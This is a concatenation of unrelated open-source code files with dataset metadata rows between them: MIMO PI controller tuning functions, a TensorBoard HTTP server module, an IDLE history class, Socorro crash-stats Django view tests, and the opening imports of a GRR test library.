# Get the Minor diagonals
return Ky,B,D
# Modified Detuning
def Control_Decoupled(K,T,L,H, MS= None, w = 0, b=np.empty, structure = 'PI', method ='dynamic', pairing = np.empty):
# Check Input for Maximum Sensitivity
if MS is None:
MS = 1.4*np.eye(K.shape[0],K.shape[1])
# Compute Determinant of Maximum Sensitivity
ms = np.linalg.det(MS)
# Compute SISO Case
if K.ndim <= 1:
return Control_Decentral(K,T,L,w,b,structure)
# Compute General MIMO Case
else:
# Compute a decentralized control structure based on RGA
Ky, B, D = Control_Decentral(K,T,L, w , b, structure, pairing = pairing)
# Calculate the Pairing
if pairing == np.empty:
# Compute RGA -> Checks for Shape
LG = RGA(K,T,L,w)
Pairing = np.argmax(LG, axis=0)
else:
Pairing = pairing
# Compute the Taylor Series
Gamma = np.multiply(-K,T+L)
# Initialize
# Gain
KD = np.zeros_like(Gamma)
# Interaction
GD = np.zeros_like(Gamma)
# Get the Diagonal entries for decoupling
for outputs in range(0,K.shape[0]):
inputs = Pairing[outputs]
KD[outputs][inputs] = K[outputs][inputs]
GD[outputs][inputs] = Gamma[outputs][inputs]
# Get the Antidiagonal
# Gain
KA = K-KD
# Interaction
GA = Gamma-GD
# Define the splitter
S = -np.dot(np.linalg.inv(KD),KA)
# Get the interaction relative to the gain
if method == 'dynamic':
# Interaction relative to the dynamic of the interaction
GammaA = np.abs(np.dot(np.linalg.inv(GD),GA) + S)
elif method == 'static':
# Interaction relative to the gain
GammaA = np.abs(np.dot(np.linalg.inv(KD),np.add(GA,np.dot(GD,S))))
else:
# Interaction relative to the dynamic of the interaction
GammaA = np.abs(np.dot(np.linalg.inv(GD),GA) + S)
#print(GammaA)
# Get the maximum of each row
GMax = np.argmax(GammaA,axis=1)
#print(GMax)
#Iterate through the outputs
for outputs in range(0,K.shape[0]):
inputs = Pairing[outputs]
# Test the current controller for interaction
# Every controller has the dimension 3 for kp, ki, kd
ky = Ky[outputs][inputs]
#kr = Kr[outputs][inputs]
# Get the current parameter
k = K[outputs][inputs]
t = T[outputs][inputs]
l = L[outputs][inputs]
# Calculate the detuning frequency
R = 0.8
wc_min = 2.0/R * (t+l)/((t+l)**2 + t**2)
# Check for set point weight, either given
if b == np.empty:
# Or computed from AMIGO_TUNE
b = B[outputs][inputs]
gmax = GammaA[GMax[outputs]][outputs]
#print(gmax)
# Check for PI Structure
if structure == 'PI':
# Define the counter
counter = 0
# Set shrinking rate
shrink_rate = 0.9
while (np.abs(H[outputs][outputs]/(ms*gmax)) - np.sqrt( (b*ky[0]/wc_min)**2 + ky[1]**2 ) < 0):
if counter > 5:
#print('Maximal Iteration for detuning reached! Abort')
break
# Detune the controller with the shrinking rate
ky = AMIGO_DETUNE(k,t,l,ky,shrink_rate*ky[0])
# Increment counter
counter += 1
print("Modified Detuning Iterationts "+str(counter))
# Get the controller parameter
Ky[outputs][inputs][:] = ky
#Kr[outputs][inputs][:] = [b*ky[0], ky[1], ky[2]]
# Return the controller with splitter
return Ky,B,np.eye(K.shape[0],K.shape[1])+S
################################# MIMO FUNCTIONS FOR SIMULATION############################
def tf_system(ss, omega):
# Get the matrices
A = ss['A']
B = ss['B']
C = ss['C']
D = ss['D']
# Make a I matrix ( depends on the states)
I = np.eye(A.shape[0])
# The Transfer Function
G = np.dot(np.dot(C,np.linalg.inv(omega*1j*I-A)),B)+D
return G
# Compute a controller for a given KY, B, D
def compute_pi(KY, B, D):
# Make KPR,KPY, KIR and KIY
KPR = np.zeros((2,2))
KPY = np.zeros((2,2))
KIR = np.zeros((2,2))
KIY = np.zeros((2,2))
# Fill with values
for outputs in range(0,2):
for inputs in range(0,2):
# Proportional Controller
KPY[outputs,inputs] = KY[outputs,inputs,0]
# Intergral Controller
KIY[outputs,inputs] = KY[outputs,inputs,1]
# Implement Set-point Weight
KPR = np.dot(B,KPY)
KIR = KIY
# Implement Decoupler
KPR = np.dot(D,KPR)
KIR = np.dot(D,KIR)
KPY = np.dot(D,KPY)
KIY = np.dot(D,KIY)
return KPR, KIR, KPY, KIY
# Compute the sensitivity function of a closed loop
# Takes system, controller and frequency
def compute_sensitivity(ss,KY,B,D,omega):
# Compute the transfer function matrix
G = tf_system(ss, omega)
# Compute the controller
KPR, KIR, KPY, KIY = compute_pi(KY,B,D)
# Compute the sensitivity
S = np.linalg.inv(np.eye(2,2)+np.dot(G,np.add(KPY,1/(omega*1j)*KIY)))
return S
# Compute complementary sensitivity of a closed loop
# Takes system, controller and frequency
def compute_complementarysensitivity(ss, KY, B, D, omega):
# Compute the transfer function matrix
G = tf_system(ss, omega)
# Compute the controller
KPR, KIR, KPY, KIY = compute_pi(KY,B,D)
# Compute the sensitivitiy
S = compute_sensitivity(ss, KY, B, D, omega)
# Compute the complementary sensitivity
T = np.dot(S,np.dot(G, np.add(KPR,1/(omega*1j)*KIR) ))
return T
#TUBScolorscale = [
# '#ffc82a','#ffd355','#ffde7f','#ffe9aa','#fff4d4',
# '#e16d00','#e78a33','#eda766','#f3c599','#f9e2cc',
# '#711c2f','#8d4959','#aa7782','#c6a4ac','#e3d2d5',
# '#acc13a', '#bdcd61','#cdda89','#dee6b0','#eef3d8','#6d8300','#8a9c33','#a7b566','#c5cd99','#e2e6cc','#00534a','#33756e','#669892','#99bab7','#ccdddb',
# '#66b4d3','#85c3dc','#a3d2e5','#c2e1ed','#e0f0f6','#00709b','#338daf','#66a9c3','#99c6d7','#cce2eb','#003f57','#336579','#668c9a','#99b2bc','#ccd9dd',
# '#8a307f','#a15999','#b983b2','#d0accc','#e8d6e5','#511246','#74416b','#977190','#b9a0b5','#dcd0da','#4c1830','#704659','#947483','#b7a3ac','#dbd1d6'
#]
# Only Main Colors
# Black, Red, Yellow, Orange, Dark Red, Light Green, Green, Dark Green, Light Blue, Blue, Dark Blue, Light Violet, Violet, Dark Violet
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13
TUBScolorscale = [
'#000000','#be1e3c','#ffc82a', '#e16d00', '#711c2f', '#acc13a', '#6d8300', '#00534a',
'#66b4d3','#00709b','#003f57','#8a307f','#511246','#4c1830', '#FF00FF'
]
def cm2in(*tupl):
"""Stack overflow-> User gns-ank"""
inch = 2.54
if isinstance(tupl[0], tuple):
return tuple(i/inch for i in tupl[0])
else:
return tuple(i/inch for i in tupl) | gpl-3.0 | 744,544,014,905,445,900 | 32.236066 | 156 | 0.535836 | false |
awni/tensorflow | tensorflow/tensorboard/backend/server.py | 4 | 5850 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Module for building TensorBoard servers.
This is its own module so it can be used in both actual code and test code.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import threading
import time
import six
from six.moves import BaseHTTPServer
from six.moves import socketserver
from tensorflow.python.platform import logging
from tensorflow.python.summary import event_accumulator
from tensorflow.python.summary.impl import gcs
from tensorflow.tensorboard.backend import handler
# How many elements to store per tag, by tag type
TENSORBOARD_SIZE_GUIDANCE = {
event_accumulator.COMPRESSED_HISTOGRAMS: 500,
event_accumulator.IMAGES: 4,
event_accumulator.SCALARS: 1000,
event_accumulator.HISTOGRAMS: 1,
}
# How often to reload new data after the latest load (secs)
LOAD_INTERVAL = 60
def ParseEventFilesSpec(logdir):
"""Parses `logdir` into a map from paths to run group names.
The events files flag format is a comma-separated list of path specifications.
A path specification either looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a
spec with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
logdir: A comma-separated list of run specifications.
Returns:
A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
Groups without an explicit name are named after their path. If logdir is
None, returns an empty dict, which is helpful for testing things that don't
require any valid runs.
"""
files = {}
if logdir is None:
return files
for specification in logdir.split(','):
# If it's a gcs path, don't split on colon
if gcs.IsGCSPath(specification):
run_name = None
path = specification
# If the spec looks like /foo:bar/baz, then we assume it's a path with a
# colon.
elif ':' in specification and specification[0] != '/':
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(':')
else:
run_name = None
path = specification
if not os.path.isabs(path) and not gcs.IsGCSPath(path):
# Create absolute path out of relative one.
path = os.path.join(os.path.realpath('.'), path)
files[path] = run_name
return files
def ReloadMultiplexer(multiplexer, path_to_run):
"""Loads all runs into the multiplexer.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
"""
start = time.time()
for (path, name) in six.iteritems(path_to_run):
multiplexer.AddRunsFromDirectory(path, name)
multiplexer.Reload()
duration = time.time() - start
logging.info('Multiplexer done loading. Load took %0.1f secs', duration)
def StartMultiplexerReloadingThread(multiplexer,
path_to_run,
load_interval=LOAD_INTERVAL):
"""Starts a thread to automatically reload the given multiplexer.
The thread will reload the multiplexer by calling `ReloadMultiplexer` every
`load_interval` seconds, starting immediately.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
load_interval: How many seconds to wait after one load before starting the
next load.
Returns:
A started `threading.Thread` that reloads the multiplexer.
"""
# Ensure the Multiplexer initializes in a loaded state before it adds runs
# So it can handle HTTP requests while runs are loading
multiplexer.Reload()
for path in path_to_run.keys():
if gcs.IsGCSPath(path):
gcs.CheckIsSupported()
logging.info(
'Assuming %s is intended to be a Google Cloud Storage path because '
'it starts with %s. If it isn\'t, prefix it with \'/.\' (i.e., use '
'/.%s instead)', path, gcs.PATH_PREFIX, path)
def _ReloadForever():
while True:
ReloadMultiplexer(multiplexer, path_to_run)
time.sleep(load_interval)
thread = threading.Thread(target=_ReloadForever)
thread.daemon = True
thread.start()
return thread
class ThreadedHTTPServer(socketserver.ThreadingMixIn,
BaseHTTPServer.HTTPServer):
"""A threaded HTTP server."""
daemon = True
def BuildServer(multiplexer, host, port):
"""Sets up an HTTP server for running TensorBoard.
Args:
multiplexer: An `EventMultiplexer` that the server will query for
information about events.
host: The host name.
port: The port number to bind to, or 0 to pick one automatically.
Returns:
A `BaseHTTPServer.HTTPServer`.
"""
factory = functools.partial(handler.TensorboardHandler, multiplexer)
return ThreadedHTTPServer((host, port), factory)
| apache-2.0 | -8,770,988,719,488,214,000 | 33.210526 | 80 | 0.698632 | false |
lonnen/socorro | webapp-django/crashstats/signature/tests/test_views.py | 1 | 32115 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import json
from urllib.parse import quote
import mock
import pyquery
from django.urls import reverse
from django.utils.encoding import smart_text
from crashstats.crashstats import models
from crashstats.crashstats.tests.test_views import BaseTestViews
from crashstats.supersearch.models import SuperSearchUnredacted
DUMB_SIGNATURE = 'hang | mozilla::wow::such_signature(smth*)'
class TestViews(BaseTestViews):
def setUp(self):
super().setUp()
# Mock get_versions_for_product() so it doesn't hit supersearch breaking the
# supersearch mocking
self.mock_gvfp = mock.patch('crashstats.crashstats.utils.get_versions_for_product')
self.mock_gvfp.return_value = ['20.0', '19.1', '19.0', '18.0']
self.mock_gvfp.start()
def tearDown(self):
self.mock_gvfp.stop()
super().tearDown()
def test_signature_report(self):
url = reverse('signature:signature_report')
response = self.client.get(url, {'signature': DUMB_SIGNATURE})
assert response.status_code == 200
assert DUMB_SIGNATURE in smart_text(response.content)
assert 'Loading' in smart_text(response.content)
def test_signature_reports(self):
def mocked_supersearch_get(**params):
assert '_columns' in params
assert 'uuid' in params['_columns']
assert 'signature' in params
assert params['signature'] == ['=' + DUMB_SIGNATURE]
if 'product' in params:
results = {
"hits": [
{
"date": "2017-01-31T23:12:57",
"uuid": "aaaaaaaaaaaaa1",
"product": "WaterWolf",
"version": "1.0",
"platform": "Linux",
"build_id": 888981,
"cpu_info": "FakeAMD family 20 model 42",
},
{
"date": "2017-01-31T23:12:57",
"uuid": "aaaaaaaaaaaaa2",
"product": "WaterWolf",
"version": "1.0",
"platform": "Linux",
"build_id": 888981,
"cpu_info": "AuthenticAMD family 20 model 1",
},
{
"date": "2017-01-31T23:12:57",
"uuid": "aaaaaaaaaaaaa3",
"product": "WaterWolf",
"version": "1.0",
"platform": "Linux",
"build_id": None
},
{
"date": "2017-01-31T23:12:57",
"uuid": "aaaaaaaaaaaaa4",
"product": "WaterWolf",
"version": "1.0",
"platform": "Linux",
"build_id": None
}
],
"total": 4
}
results['hits'] = self.only_certain_columns(
results['hits'],
params['_columns']
)
return results
return {"hits": [], "total": 0}
SuperSearchUnredacted.implementation().get.side_effect = mocked_supersearch_get
# Test with no results.
url = reverse('signature:signature_reports')
response = self.client.get(url, {
'signature': DUMB_SIGNATURE,
'date': '2012-01-01',
})
assert response.status_code == 200
assert 'table id="reports-list"' not in smart_text(response.content)
assert 'No results were found' in smart_text(response.content)
# Test with results.
response = self.client.get(url, {
'signature': DUMB_SIGNATURE,
'product': 'WaterWolf'
})
assert response.status_code == 200
assert 'table id="reports-list"' in smart_text(response.content)
assert 'aaaaaaaaaaaaa1' in smart_text(response.content)
assert '888981' in smart_text(response.content)
assert 'Linux' in smart_text(response.content)
assert '2017-01-31 23:12:57' in smart_text(response.content)
assert 'AMD' in smart_text(response.content)
assert 'Cpu info' not in smart_text(response.content)
# Test with a different columns list.
response = self.client.get(url, {
'signature': DUMB_SIGNATURE,
'product': 'WaterWolf',
'_columns': ['build_id', 'platform'],
})
assert response.status_code == 200
assert 'table id="reports-list"' in smart_text(response.content)
# The build and platform appear
assert '888981' in smart_text(response.content)
assert 'Linux' in smart_text(response.content)
# The crash id is always shown
assert 'aaaaaaaaaaaaa1' in smart_text(response.content)
# The version and date do not appear
assert '1.0' not in smart_text(response.content)
assert '2017' not in smart_text(response.content)
# Test missing parameter.
response = self.client.get(url)
assert response.status_code == 400
response = self.client.get(url, {
'signature': '',
})
assert response.status_code == 400
def test_parameters(self):
def mocked_supersearch_get(**params):
# Verify that all expected parameters are in the URL.
assert 'product' in params
assert 'WaterWolf' in params['product']
assert 'NightTrain' in params['product']
assert 'address' in params
assert '0x0' in params['address']
assert '0xa' in params['address']
assert 'reason' in params
assert '^hello' in params['reason']
assert '$thanks' in params['reason']
assert 'java_stack_trace' in params
assert 'Exception' in params['java_stack_trace']
return {
"hits": [],
"facets": "",
"total": 0
}
SuperSearchUnredacted.implementation().get.side_effect = mocked_supersearch_get
url = reverse('signature:signature_reports')
response = self.client.get(
url, {
'signature': DUMB_SIGNATURE,
'product': ['WaterWolf', 'NightTrain'],
'address': ['0x0', '0xa'],
'reason': ['^hello', '$thanks'],
'java_stack_trace': 'Exception',
}
)
assert response.status_code == 200
def test_signature_reports_pagination(self):
"""Test that the pagination of results works as expected"""
def mocked_supersearch_get(**params):
assert '_columns' in params
# Make sure a negative page does not lead to negative offset value.
# But instead it is considered as the page 1 and thus is not added.
assert params.get('_results_offset') == 0
hits = []
for i in range(140):
hits.append({
"signature": "nsASDOMWindowEnumerator::GetNext()",
"date": "2017-01-31T23:12:57",
"uuid": i,
"product": "WaterWolf",
"version": "1.0",
"platform": "Linux",
"build_id": 888981
})
return {
"hits": self.only_certain_columns(hits, params['_columns']),
"facets": "",
"total": len(hits)
}
SuperSearchUnredacted.implementation().get.side_effect = mocked_supersearch_get
url = reverse('signature:signature_reports')
response = self.client.get(
url,
{
'signature': DUMB_SIGNATURE,
'product': ['WaterWolf'],
'_columns': ['platform']
}
)
assert response.status_code == 200
assert '140' in smart_text(response.content)
# Check that the pagination URL contains all three expected parameters.
doc = pyquery.PyQuery(response.content)
next_page_url = str(doc('.pagination a').eq(0))
assert 'product=WaterWolf' in next_page_url
assert '_columns=platform' in next_page_url
assert 'page=2' in next_page_url
# Verify white spaces are correctly encoded.
# Note we use `quote` and not `quote_plus`, so white spaces are
# turned into '%20' instead of '+'.
assert quote(DUMB_SIGNATURE) in next_page_url
# Test that a negative page value does not break it.
response = self.client.get(url, {
'signature': DUMB_SIGNATURE,
'page': '-1',
})
assert response.status_code == 200
def test_signature_aggregation(self):
def mocked_supersearch_get(**params):
assert 'signature' in params
assert params['signature'] == ['=' + DUMB_SIGNATURE]
assert '_facets' in params
if 'product' in params['_facets']:
return {
"hits": [],
"facets": {
"product": [
{
"term": "windows",
"count": 42,
},
{
"term": "linux",
"count": 1337,
},
{
"term": "mac",
"count": 3,
},
]
},
"total": 1382
}
# the default
return {
"hits": [],
"facets": {
"platform": []
},
"total": 0
}
SuperSearchUnredacted.implementation().get.side_effect = mocked_supersearch_get
# Test with no results.
url = reverse('signature:signature_aggregation', args=('platform',))
response = self.client.get(url, {'signature': DUMB_SIGNATURE})
assert response.status_code == 200
assert 'Product' not in smart_text(response.content)
assert 'No results were found' in smart_text(response.content)
# Test with results.
url = reverse('signature:signature_aggregation', args=('product',))
response = self.client.get(url, {'signature': DUMB_SIGNATURE})
assert response.status_code == 200
assert 'Product' in smart_text(response.content)
assert '1337' in smart_text(response.content)
assert 'linux' in smart_text(response.content)
assert str(int(1337 / 1382 * 100)) in smart_text(response.content)
assert 'windows' in smart_text(response.content)
assert 'mac' in smart_text(response.content)
def test_signature_graphs(self):
def mocked_supersearch_get(**params):
assert 'signature' in params
assert params['signature'] == ['=' + DUMB_SIGNATURE]
assert '_histogram.date' in params
assert '_facets' in params
if 'product' in params['_facets']:
return {
"hits": [],
"total": 4,
"facets": {
"product": [
{
"count": 4,
"term": "WaterWolf"
}
],
"histogram_date": [
{
"count": 2,
"term": "2015-08-05T00:00:00+00:00",
"facets": {
"product": [
{
"count": 2,
"term": "WaterWolf"
}
]
}
},
{
"count": 2,
"term": "2015-08-06T00:00:00+00:00",
"facets": {
"product": [
{
"count": 2,
"term": "WaterWolf"
}
]
}
}
]
}
}
return {
"hits": [],
"total": 0,
"facets": {
"platform": [],
"signature": [],
"histogram_date": []
}
}
SuperSearchUnredacted.implementation().get.side_effect = mocked_supersearch_get
# Test with no results
url = reverse('signature:signature_graphs', args=('platform',))
response = self.client.get(url, {'signature': DUMB_SIGNATURE})
assert response.status_code == 200
assert 'application/json' in response['content-type']
struct = json.loads(response.content)
assert 'aggregates' in struct
assert len(struct['aggregates']) == 0
assert 'term_counts' in struct
assert len(struct['term_counts']) == 0
# Test with results
url = reverse('signature:signature_graphs', args=('product',))
response = self.client.get(url, {'signature': DUMB_SIGNATURE})
assert response.status_code == 200
assert 'application/json' in response['content-type']
struct = json.loads(response.content)
assert 'aggregates' in struct
assert len(struct['aggregates']) == 2
assert 'term_counts' in struct
assert len(struct['term_counts']) == 1
def test_signature_comments_no_permission(self):
"""Verify comments are not viewable without view_pii."""
url = reverse('signature:signature_comments')
response = self.client.get(url, {'signature': 'whatever'})
assert response.status_code == 403
def test_signature_comments(self):
def mocked_supersearch_get(**params):
assert '_columns' in params
assert 'signature' in params
assert params['signature'] == ['=' + DUMB_SIGNATURE]
assert 'user_comments' in params
assert params['user_comments'] == ['!__null__']
if 'product' in params:
results = {
"hits": [
{
"date": "2017-01-31T23:12:57",
"uuid": "aaaaaaaaaaaaa1",
"product": "WaterWolf",
"version": "1.0",
"platform": "Linux",
"user_comments": "hello there people!",
"useragent_locale": "locale1"
},
{
"date": "2017-01-31T23:12:57",
"uuid": "aaaaaaaaaaaaa2",
"product": "WaterWolf",
"version": "1.0",
"platform": "Linux",
"user_comments": "I love Mozilla",
"useragent_locale": "locale2"
},
{
"date": "2017-01-31T23:12:57",
"uuid": "aaaaaaaaaaaaa3",
"product": "WaterWolf",
"version": "1.0",
"platform": "Linux",
"user_comments": "this product is awesome",
"useragent_locale": "locale3"
},
{
"date": "2017-01-31T23:12:57",
"uuid": "aaaaaaaaaaaaa4",
"product": "WaterWolf",
"version": "1.0",
"platform": "Linux",
"user_comments": "WaterWolf Y U SO GOOD?",
"useragent_locale": "locale4"
}
],
"total": 4
}
results['hits'] = self.only_certain_columns(
results['hits'],
params['_columns']
)
return results
return {"hits": [], "total": 0}
SuperSearchUnredacted.implementation().get.side_effect = mocked_supersearch_get
url = reverse('signature:signature_comments')
user = self._login()
user.groups.add(self._create_group_with_permission('view_pii'))
assert user.has_perm('crashstats.view_pii')
# Test with no results.
response = self.client.get(
url,
{'signature': DUMB_SIGNATURE}
)
assert response.status_code == 200
assert 'Crash ID' not in smart_text(response.content)
assert 'No comments were found' in smart_text(response.content)
# Test with results.
response = self.client.get(
url,
{'signature': DUMB_SIGNATURE, 'product': 'WaterWolf'}
)
assert response.status_code == 200
assert 'aaaaaaaaaaaaa1' in smart_text(response.content)
assert 'Crash ID' in smart_text(response.content)
assert 'hello there' in smart_text(response.content)
assert 'WaterWolf Y U SO GOOD' in smart_text(response.content)
assert 'locale1' in smart_text(response.content)
def test_signature_comments_pagination(self):
"""Test that the pagination of comments works as expected"""
def mocked_supersearch_get(**params):
assert '_columns' in params
if params.get('_results_offset') != 0:
hits_range = range(100, 140)
else:
hits_range = range(100)
hits = []
for i in hits_range:
hits.append({
"date": "2017-01-31T23:12:57",
"uuid": i,
"user_comments": "hi",
})
return {
'hits': self.only_certain_columns(hits, params['_columns']),
'total': 140
}
SuperSearchUnredacted.implementation().get.side_effect = mocked_supersearch_get
user = self._login()
user.groups.add(self._create_group_with_permission('view_pii'))
assert user.has_perm('crashstats.view_pii')
url = reverse('signature:signature_comments')
response = self.client.get(
url,
{
'signature': DUMB_SIGNATURE,
'product': ['WaterWolf'],
}
)
assert response.status_code == 200
assert '140' in smart_text(response.content)
assert '99' in smart_text(response.content)
assert '139' not in smart_text(response.content)
# Check that the pagination URL contains all expected parameters.
doc = pyquery.PyQuery(response.content)
next_page_url = str(doc('.pagination a').eq(0))
assert 'product=WaterWolf' in next_page_url
assert 'page=2' in next_page_url
response = self.client.get(url, {
'signature': DUMB_SIGNATURE,
'page': '2',
})
assert response.status_code == 200
assert '140' in smart_text(response.content)
assert '99' not in smart_text(response.content)
assert '139' in smart_text(response.content)
def test_signature_summary(self):
models.GraphicsDevice.objects.create(
vendor_hex='0x0086',
adapter_hex='0x1234',
vendor_name='Intel',
adapter_name='Device'
)
models.GraphicsDevice.objects.create(
vendor_hex='0x0086',
adapter_hex='0x1239',
vendor_name='Intel',
adapter_name='Other'
)
def mocked_supersearch_get(**params):
assert 'signature' in params
assert params['signature'] == ['=' + DUMB_SIGNATURE]
res = {
"hits": [],
"total": 4,
"facets": {
"platform_pretty_version": [
{
"count": 4,
"term": "Windows 7"
}
],
"cpu_arch": [
{
"count": 4,
"term": "x86"
}
],
"process_type": [
{
"count": 4,
"term": "browser"
}
],
"product": [
{
"count": 4,
"term": "WaterWolf",
"facets": {
"version": [
{
"term": "2.1b99",
"count": 2,
"facets": {
"cardinality_install_time": {
"value": 2
}
}
},
{
"term": "1.0",
"count": 2,
"facets": {
"cardinality_install_time": {
"value": 2
}
}
}
]
}
}
],
"flash_version": [
{
"count": 4,
"term": "1.1.1.14"
}
],
"adapter_vendor_id": [
{
"term": "0x0086",
"count": 4,
"facets": {
"adapter_device_id": [
{
"term": "0x1234",
"count": 2,
},
{
"term": "0x1239",
"count": 2,
}
]
}
}
],
"android_cpu_abi": [
{
"term": "armeabi-v7a",
"count": 4,
"facets": {
"android_manufacturer": [
{
"term": "ZTE",
"count": 4,
"facets": {
"android_model": [
{
"term": "roamer2",
"count": 4,
"facets": {
"android_version": [
{
"term": "15",
"count": 4,
}
]
}
}
]
}
}
]
}
}
],
"histogram_uptime": [
{
"count": 2,
"term": 0,
},
{
"count": 2,
"term": 60,
}
],
}
}
if '_histogram.date' in params:
res['facets']['histogram_date'] = [
{
"count": 2,
"term": "2015-08-05T00:00:00+00:00",
"facets": {
"exploitability": [
{
"count": 2,
"term": "high"
}
]
}
},
{
"count": 2,
"term": "2015-08-06T00:00:00+00:00",
"facets": {
"exploitability": [
{
"count": 2,
"term": "low"
}
]
}
}
]
return res
SuperSearchUnredacted.implementation().get.side_effect = mocked_supersearch_get
# Test with no results
url = reverse('signature:signature_summary')
response = self.client.get(url, {
'signature': DUMB_SIGNATURE,
'product': 'WaterWolf',
'version': '1.0',
})
assert response.status_code == 200
# Make sure all boxes are there.
assert 'Operating System' in smart_text(response.content)
assert 'Uptime Range' in smart_text(response.content)
assert 'Product' in smart_text(response.content)
assert 'Architecture' in smart_text(response.content)
assert 'Process Type' in smart_text(response.content)
assert 'Mobile Devices' in smart_text(response.content)
assert 'Graphics Adapter' in smart_text(response.content)
assert 'Flash™ Version' in smart_text(response.content)
# Logged out users can't see no exploitability
assert 'Exploitability' not in smart_text(response.content)
# Check that some of the expected values are there.
assert 'Windows 7' in smart_text(response.content)
assert 'x86' in smart_text(response.content)
assert 'WaterWolf' in smart_text(response.content)
assert '2.1b99' in smart_text(response.content)
assert 'browser' in smart_text(response.content)
assert '1.1.1.14' in smart_text(response.content)
assert '< 1 min' in smart_text(response.content)
assert '1-5 min' in smart_text(response.content)
assert 'ZTE' in smart_text(response.content)
assert 'Intel (0x0086)' in smart_text(response.content)
user = self._login()
response = self.client.get(url, {'signature': DUMB_SIGNATURE})
assert response.status_code == 200
# Logged in users without the permission can't see no exploitability
assert 'Exploitability' not in smart_text(response.content)
group = self._create_group_with_permission('view_exploitability')
user.groups.add(group)
assert user.has_perm('crashstats.view_exploitability')
response = self.client.get(url, {'signature': DUMB_SIGNATURE})
assert response.status_code == 200
# Logged in users with the permission can see exploitability
assert 'Exploitability' in smart_text(response.content)
def test_signature_summary_with_many_hexes(self):
def mocked_supersearch_get(**params):
assert 'signature' in params
assert params['signature'] == ['=' + DUMB_SIGNATURE]
adapters = [
{
'term': '0x{0:0>4}'.format(i),
'count': 1
}
for i in range(50)
]
vendors = [
{
'term': '0x{0:0>4}'.format(i),
'count': 50,
'facets': {
'adapter_device_id': adapters
}
}
for i in range(3)
]
res = {
'hits': [],
'total': 4,
'facets': {
'adapter_vendor_id': vendors,
}
}
return res
SuperSearchUnredacted.implementation().get.side_effect = mocked_supersearch_get
# Test with no results
url = reverse('signature:signature_summary')
response = self.client.get(url, {
'signature': DUMB_SIGNATURE,
'product': 'WaterWolf',
'version': '1.0',
})
assert response.status_code == 200
def test_signature_bugzilla(self):
models.BugAssociation.objects.create(
bug_id=111111,
signature='Something'
)
models.BugAssociation.objects.create(
bug_id=111111,
signature='OOM | small'
)
models.BugAssociation.objects.create(
bug_id=123456789,
signature='Something'
)
# Test with signature that has no bugs
url = reverse('signature:signature_bugzilla')
response = self.client.get(url, {
'signature': 'hang | mozilla::wow::such_signature(smth*)'
})
assert response.status_code == 200
assert 'There are no bugs' in smart_text(response.content)
# Test with signature that has bugs and related bugs
response = self.client.get(url, {
'signature': 'Something',
})
assert response.status_code == 200
assert '123456789' in smart_text(response.content)
assert '111111' in smart_text(response.content)
# because bug id 123456789 is > than 111111 we expect that order
# in the rendered output
content = smart_text(response.content)
assert (
content.find('123456789') <
content.find('111111') <
content.find('Related Crash Signatures') <
content.find('Bugs for <code>OOM | small</code>')
)
| mpl-2.0 | 2,714,568,946,903,695,400 | 36.737955 | 91 | 0.422077 | false |
leighpauls/k2cro4 | third_party/python_26/Lib/site-packages/pythonwin/pywin/idle/IdleHistory.py | 20 | 3101 | import string
class History:
def __init__(self, text, output_sep = "\n"):
self.text = text
self.history = []
self.history_prefix = None
self.history_pointer = None
self.output_sep = output_sep
text.bind("<<history-previous>>", self.history_prev)
text.bind("<<history-next>>", self.history_next)
def history_next(self, event):
self.history_do(0)
return "break"
def history_prev(self, event):
self.history_do(1)
return "break"
def _get_source(self, start, end):
# Get source code from start index to end index. Lines in the
# text control may be separated by sys.ps2 .
lines = string.split(self.text.get(start, end), self.output_sep)
return string.join(lines, "\n")
def _put_source(self, where, source):
output = string.join(string.split(source, "\n"), self.output_sep)
self.text.insert(where, output)
def history_do(self, reverse):
nhist = len(self.history)
pointer = self.history_pointer
prefix = self.history_prefix
if pointer is not None and prefix is not None:
if self.text.compare("insert", "!=", "end-1c") or \
self._get_source("iomark", "end-1c") != self.history[pointer]:
pointer = prefix = None
if pointer is None or prefix is None:
prefix = self._get_source("iomark", "end-1c")
if reverse:
pointer = nhist
else:
pointer = -1
nprefix = len(prefix)
while 1:
if reverse:
pointer = pointer - 1
else:
pointer = pointer + 1
if pointer < 0 or pointer >= nhist:
self.text.bell()
if self._get_source("iomark", "end-1c") != prefix:
self.text.delete("iomark", "end-1c")
self._put_source("iomark", prefix)
pointer = prefix = None
break
item = self.history[pointer]
if item[:nprefix] == prefix and len(item) > nprefix:
self.text.delete("iomark", "end-1c")
self._put_source("iomark", item)
break
self.text.mark_set("insert", "end-1c")
self.text.see("insert")
self.text.tag_remove("sel", "1.0", "end")
self.history_pointer = pointer
self.history_prefix = prefix
def history_store(self, source):
source = string.strip(source)
if len(source) > 2:
# avoid duplicates
try:
self.history.remove(source)
except ValueError:
pass
self.history.append(source)
self.history_pointer = None
self.history_prefix = None
def recall(self, s):
s = string.strip(s)
self.text.tag_remove("sel", "1.0", "end")
self.text.delete("iomark", "end-1c")
self.text.mark_set("insert", "end-1c")
self.text.insert("insert", s)
self.text.see("insert")
| bsd-3-clause | 1,576,524,727,443,946,200 | 33.842697 | 77 | 0.530474 | false |
spnow/grr | lib/test_lib.py | 1 | 60900 | #!/usr/bin/env python
"""A library for tests."""
import codecs
import functools
import itertools
import os
import pdb
import re
import shutil
import signal
import socket
import StringIO
import subprocess
import sys
